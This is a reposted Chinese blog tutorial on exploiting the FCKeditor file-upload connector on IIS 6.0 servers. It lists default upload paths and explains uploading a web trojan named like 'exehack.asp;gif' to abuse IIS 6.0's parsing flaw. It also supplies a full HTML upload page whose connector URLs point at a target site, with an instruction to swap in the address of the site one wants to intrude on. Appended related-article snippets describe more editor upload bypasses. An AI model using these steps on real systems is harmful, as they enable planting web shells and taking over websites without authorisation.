FCkEditor编辑器漏洞(IIS 6.0)

最新推荐文章于 2024-08-08 19:22:03 发布
转载 最新推荐文章于 2024-08-08 19:22:03 发布 · 1.3k 阅读 · 2

本文详细介绍了 Fckeditor 编辑器存在的安全漏洞,包括漏洞触发条件、利用方式及自定义上传文件的方法。文章指出,该漏洞仅在 IIS 6.0 版本的服务器上有效。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Fckeditor编辑器的漏洞几乎和ewebeditor编辑器漏洞一样严重.

与ewebeditor编辑器不通的是,Fckeditor编辑器的漏洞只存在于暴露编辑器的上传点和服务器IIS版本必须是iis6.0版本

(因为IIS6.0存在解析漏洞)

 

反之如果说服务器的IIS版本为6.0以上则无法利用。

一般情况下fckeditor编辑器的默认上传地址为:

/expansion/fckeditor/editor/filemanager/connectors/test.html
/expansion/fckeditor/editor/filemanager/connectors/uploadtest.html

如下图所示:

20140512201218

1知道了编辑器的上传地址后选择Connector项目的网站语言 一般情况下是选择asp 或者 asp.net

2.然后点击 Get Folders and Files  即可查看网站的图片目录文件 然后即可点击 浏览 选择我们的网站木马 点击上传即可。

3.上传成功后回到 Get Folders and Files 即可查看到上传的文件

20140512202001

如上图所示图片目录为 /uploadfile/  我们的木马名字是  exehack.asp;gif  

(注意:上传成功后一般情况下系统会自动按照时间格式改名大家可以在图片目录下查看上传成功后的木马名字)

如果我们存在漏洞的网站是http://exehack.net 网站那么上传成功后的木马文件就在http://exehack.net/uploadfile/木马.asp;gif

 

由于Fckeditor是一款比较老的编辑器了 漏洞也存在了比较长的时候.有时候存在漏洞的页面被管理员或者别人删除或者修改了内容 

 

 

我们就无法找到上传点了。

比如如下情况:

2

那么我们可以在本地创建一个上传文件 文件代码如下:

 

<!-- 
* FCKeditor - The text editor for Internet - http://www.fckeditor.net 
* Copyright (C) 2003-2007 Frederico Caldeira Knabben 
* 
* == BEGIN LICENSE == 
* 
* Licensed under the terms of any of the following licenses at your 
* choice: 
* 
*  - GNU General Public License Version 2 or later (the "GPL") 
*    http://www.gnu.org/licenses/gpl.html 
* 
*  - GNU Lesser General Public License Version 2.1 or later (the "LGPL") 
*    http://www.gnu.org/licenses/lgpl.html 
* 
*  - Mozilla Public License Version 1.1 or later (the "MPL") 
*    http://www.mozilla.org/MPL/MPL-1.1.html 
* 
* == END LICENSE == 
* 
* Test page for the File Browser connectors. 
--> 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
    <title>FCKeditor - Connectors Tests</title> 
    <script type="text/javascript"> 
function BuildBaseUrl( command ) 
{ 
    var sUrl = 
        document.getElementById('cmbConnector').value + 
        '?Command=' + command + 
        '&Type=' + document.getElementById('cmbType').value + 
        '&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ; 
    return sUrl ; 
} 
function SetFrameUrl( url ) 
{ 
    document.getElementById('eRunningFrame').src = url ; 
    document.getElementById('eUrl').innerHTML = url ; 
} 
function GetFolders() 
{ 
    SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ; 
    return false ; 
} 
function GetFoldersAndFiles() 
{ 
    SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ; 
    return false ; 
} 
function CreateFolder() 
{ 
    var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ; 
    if ( ! sFolder ) 
        return false ; 
    var sUrl = BuildBaseUrl( 'CreateFolder' ) ; 
    sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ; 
    SetFrameUrl( sUrl ) ; 
    return false ; 
} 
function OnUploadCompleted( errorNumber, fileName ) 
{ 
    switch ( errorNumber ) 
    { 
        case 0 : 
            alert( 'File uploaded with no errors' ) ; 
            break ; 
        case 201 : 
            GetFoldersAndFiles() ; 
            alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ; 
            break ; 
        case 202 : 
            alert( 'Invalid file' ) ; 
            break ; 
        default : 
            alert( 'Error on file upload. Error number: ' + errorNumber ) ; 
            break ; 
    } 
} 
this.frames.frmUpload = this ; 
function SetAction() 
{ 
    var sUrl = BuildBaseUrl( 'FileUpload' ) ; 
    document.getElementById('eUrl').innerHTML = sUrl ; 
    document.getElementById('frmUpload').action = sUrl ; 
} 
    </script> 
</head> 
<body> 
    <table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0"> 
<tr> 
            <td> 
                <table cellspacing="0" cellpadding="0" border="0"> 
                    <tr> 
                        <td> 
                            Connector:<br /> 
                            <select id="cmbConnector" name="cmbConnector">
<!-- 改地址的地方 -->
  <option value="http://www.exehack.net/expansion/fckeditor/editor/filemanager/connectors/asp/connector.asp" selected="selected">ASP</option> 
  <option value="http://www.exehack.net/expansion/fckeditor/editor/filemanager/connectors/aspx/connector.aspx" selected="selected">ASP.Net</option> 
  <option value="http://www.exehack.net/expansion/fckeditor/editor/filemanager/connectors/php/connector.php" selected="selected">PHP</option> 
  <option value="http://www.exehack.net/expansion/fckeditor/editor/filemanager/connectors/php/connector.php" selected="selected">小残<span style="color: red;font-size: 8px;">PHP</span></option>
<!-- 改地址的地方 -->
                            </select> 
                        </td> 
                        <td> 
                               </td> 
                        <td> 
                            Current Folder<br /> 
                            <input id="txtFolder" type="text" value="/" name="txtFolder" /></td> 
                        <td> 
                               </td> 
                        <td> 
Resource Type<br /> 
                            <select id="cmbType" name="cmbType"> 
                                <option value="File" selected="selected">File</option> 
                                <option value="Image">Image</option> 
                                <option value="Flash">Flash</option> 
                                <option value="Media">Media</option> 
                                <option value="Invalid">Invalid Type (for testing)</option> 
                            </select> 
                        </td> 
                    </tr> 
                </table> 
                <br /> 
                <table cellspacing="0" cellpadding="0" border="0"> 
                    <tr> 
                        <td valign="top"> 
                            <a href="#" onclick="GetFolders();">Get Folders</a></td> 
                        <td> 
                               </td> 
                        <td valign="top"> 
                            <a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td> 
                        <td> 
                               </td> 
                        <td valign="top"> 
                            <a href="#" onclick="CreateFolder();">Create Folder</a></td> 
                        <td> 
                               </td> 
<td valign="top"> 
                            <form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data"> 
                                File Upload<br /> 
                                <input id="txtFileUpload" type="file" name="NewFile" /> 
                                <input type="submit" value="Upload" onclick="SetAction();" /> 
                            </form> 
                        </td> 
                    </tr> 
                </table> 
                <br /> 
                URL: <span id="eUrl"></span> 
            </td> 
        </tr> 
        <tr> 
            <td height="100%" valign="top"> 
                <iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%" 
                    height="100%"></iframe> 
            </td> 
        </tr> 
    </table> 
</body> 
</html>

可以将以上代码中的  http://www.exehack.net/expansion  修改为需要入侵的网站地址后将代码保存为1.html 然后打开进行上传

大唐卡蒙
关注
[网络安全自学篇] 三十.文件上传漏洞编辑器漏洞IIS高版本漏洞及防御(三)
杨秀璋的专栏
12-15 9521
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了文件上传漏洞IIS6.0解析漏洞,包括PHP345文件绕过上传、Windows ::$DATA绕过、Apache解析漏洞上传等;这篇文章将分享编辑器漏洞IIS高版本文件上传漏洞,包括FCKeditor、eWebEditor、畸形解析漏洞等,同时结合Caidao工具介绍拿站的流程及防御原理。如果文章对您有帮助,将是我创作的最大动力。
ue编辑器漏洞_FCKeditor编辑器漏洞利用
weixin_39976413的博客
12-21 220
file:///C|/Users/Administrator/Desktop/FCKeditor编辑器漏洞利用.txt[2011/4/416:08:04]FCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页FCKeditor/_samples/default.html查看编辑器版本FCKeditor/_whatsnew.html查看文件上传路径fckeditor...
FCKeditor编辑器漏洞
arissa666的博客
10-18 538
FCKeditor在网页上属于开发源代码的文字编辑器,FCK是作者的名字。
【渗透测试】--- FCKeditor文本编辑器漏洞
热门推荐
qq_43168364的博客
12-25 1万+
一、FCKeditor编辑器漏洞 FCKeditor编辑器是一款强大的所见即所得文本编辑器,现在已经更名为:CKEditor fckeditor的常见敏感目录(FCK有时要小写) (1) 查看版本信息 /FCKeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html (2) 默认上传页面 /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/edito
2024年最新fckeditor编辑器上传漏洞getshell——突破(1),2024物联网嵌入式开发死我
2401_85011796的博客
05-14 1893
百度搜索fckeditor编辑器漏洞利用,找到参考链接:https://www.cnblogs.com/milantgh/p/3775396.html,按照链接中常用上传地址挨个进行测试。访问上传的文件后,发现是图片,并没有当作asp进行解析。_x(1).jpg,以前这种方法是可以的,但这个环境可以,知道此方法就行。接下来,查看目标网站搭建平台,发现是IIS6.0,那么可以结合IIS6.0的解析漏洞进行利用。测试过程中发现第三个会弹窗提示,说明没有访问到上传目录,那么添加…上传logo.asp;
22-任意文件上传编辑器漏洞(Ewebeditor、fckeditor、CKFinder、southidceditor等)(五)
XLbb的博客
05-14 2220
其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件,CKFinder在上传文件的时候,强制将文件名(包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传1_php;确定有system_dntb/uploadimg.aspx并能打开,这时候是上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具。:升级编辑器,实施严格的文件上传策略,禁用IIS安全的文件解析功能。
漏洞复现- - -IIS解析漏洞fckEditor上传攻击中的利用
weixin_67503304的博客
10-26 2340
本文主要讲解了IIS解析漏洞fckEditor上传攻击中的利用方式及其详细步骤。
WEB渗透Web突破篇-编辑器漏洞
最新发布
qq_59468567的博客
08-08 863
影响版本: 较早版本 脆弱描述:通过自定义Type变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制。攻击利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp 打开这个地址就可以上传任何类型的文件了,Shell上传到的默认位置是:XXXX。
php fck编辑器拿shell,Fck编辑器漏洞
weixin_36263314的博客
03-19 800
本来想写下Fck漏洞总结的, 写着写着就感觉好组织语言了,其实这个漏洞存在的时间很久了,过有时候在渗透测试项F目中,偶尔还是会遇到的,我就大概写一下吧,具体的大家可以查看我上传的资料,那里面讲的很仔细。0x01.查看编辑器版本/fckeditor/editor/dialog/fck_about.html/FCKeditor/_whatsnew.html0x02.寻找上传页面,其中默认上传页面...
网页编辑器漏洞大全
07-13
涵盖了诸如常见的FCKeditor、eWebEditor、Cuteditor、Freetextbox、Webhtmleditor、Kindeditor、所谓的eWebEditorNET、所谓的 southidceditor、所谓的bigcneditor
PHP-XXE-Lab——漏洞利用
W小哥
12-22 1901
一、环境搭建 环境源码下载地址:https://github.com/c0ny1/xxe-lab 下载后,php_xxe放在网站根目录即可运行 二、漏洞利用 访问目标网站,如下图所示 输入用户名、密码后,使用burpsuite拦截数据包,仔细观察传输数据的部分,跟大多数传输数据方式一样 大多数传递方式,是下面这两种 所以,如果在渗透测试过程中,发现POST数据传递方式是 adminpassword 则说明,网站是采用的XML语言接收的数据,此处可能存在XXE漏洞 接下来,利用XXE漏洞读取敏感文件
fckeditor漏洞_三十,文件上传漏洞编辑器漏洞IIS高版本漏洞及防御
qq_50854662的博客
11-08 5302
fckeditor漏洞_三十,文件上传漏洞编辑器漏洞IIS高版本漏洞及防御
ASP.NET配置fckEditor编辑器方法和fckEditor漏洞修复
O Wen
07-31 1642
在线编辑器中,FCKeditor是我用过最爽的,也是目前互联网上最好的编辑器,功能强大,支持多种浏览器,无平台限制,可以和多种WEB语言融合,多语言支持,而且还支持开源!^-^可它的确是太强大了! 以致于可以被别有用心的人轻易利用。比如想禁止使用文件上传功能,请看下面内容:FCKeditor在Asp.Net中的配置抄录如下:环境以Asp.net开发来进行讲解,步骤如下:1、获取文件我们可以从http://www.fckeditor.net/download下载两个压缩文件,第一个是FCKeditor.Ne
Fckeditor漏洞利用方法总结
oceanark的博客
07-13 6468
1.查看编辑器版本 FCKeditor/_whatsnew.html —————————————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 —————————————————————————————————————— 3.Version action=”ht
fckeditor任意文件上传漏洞
u012684933的专栏
02-26 6399
1. 创建.htaccess文件,内容如下: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php .htaccess文件可以用来设置某个目录和某个目录的子目录的权限,以上内容的意思是将扩展名是"_php.gif"的文件解析成php 2.使用如下url,上
FCKeditor(FCK)上传漏洞利用原理详解
积木网络
12-15 6193
积木网络FCK的问题与IIS的解析漏洞有着密切的关系,自IIS解析漏洞披露后,fck就遭受了新一轮冲击。由于fck对上传文件的扩展名检查严格,导致了一些畸形文件名文件的上传,比如上面说道的test.asp;z.jpg,而由于IIS解析漏洞的原因,IIS会把这种格式的文件当做动态文件解析。FCK修正了一次之后,又出现了二次上传漏洞,就是第一次会把扩展名中多余的”.“替换成”-“,但是如果再传一次同
编辑器漏洞详解
qq_40806924的博客
06-28 1889
此处链接到大佬地址 http://navisec.it/编辑器漏洞手册/ 本人做学习记录 一、FCKeditor 编辑器FCKeditor/_samples/default.html FCKeditor/_samples/default.html FCKeditor/_samples/asp/sample01.asp FCKeditor/_samples/asp/sample02.asp FCKeditor/_samples/asp/sample03.asp FCKeditor/_samples/asp
文件上传(包括编辑器上传漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
wangluoanquan111的博客
04-02 1156
由于服务器认为上传的是JPEG图片,所以文件将被放行,即使上传的实际是一个可执行的PHP脚本,也将被视为正常的图片文件。type,即便上传一个“avatar.jpg”文件,实际上这是一个php脚本文件,攻击者成功绕过了文件类型检测机制,该文件会被服务器识别为php文件并执行其中的恶意代码。注意,以上是常用的一些示例,但黑客可能会使用其他扩展名和方法来绕过黑名单。如果限制文件大小的方法充分,攻击者可以通过在上传之前将大文件拆分成多个小文件并分别上传来绕过限制,在上传时,攻击者可能会将文件重新组合起来。
FCKEditor编辑器使用方法及特点
尽管当前CKEditor系列仍在广泛使用,但本文将重点介绍FCKEditor编辑器的特点、技术细节及其在Web开发中的应用。 ### FCKEditor编辑器的特点与功能 #### 可定制性 FCKEditor提供高度的可定制性,开发者可以通过更改...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值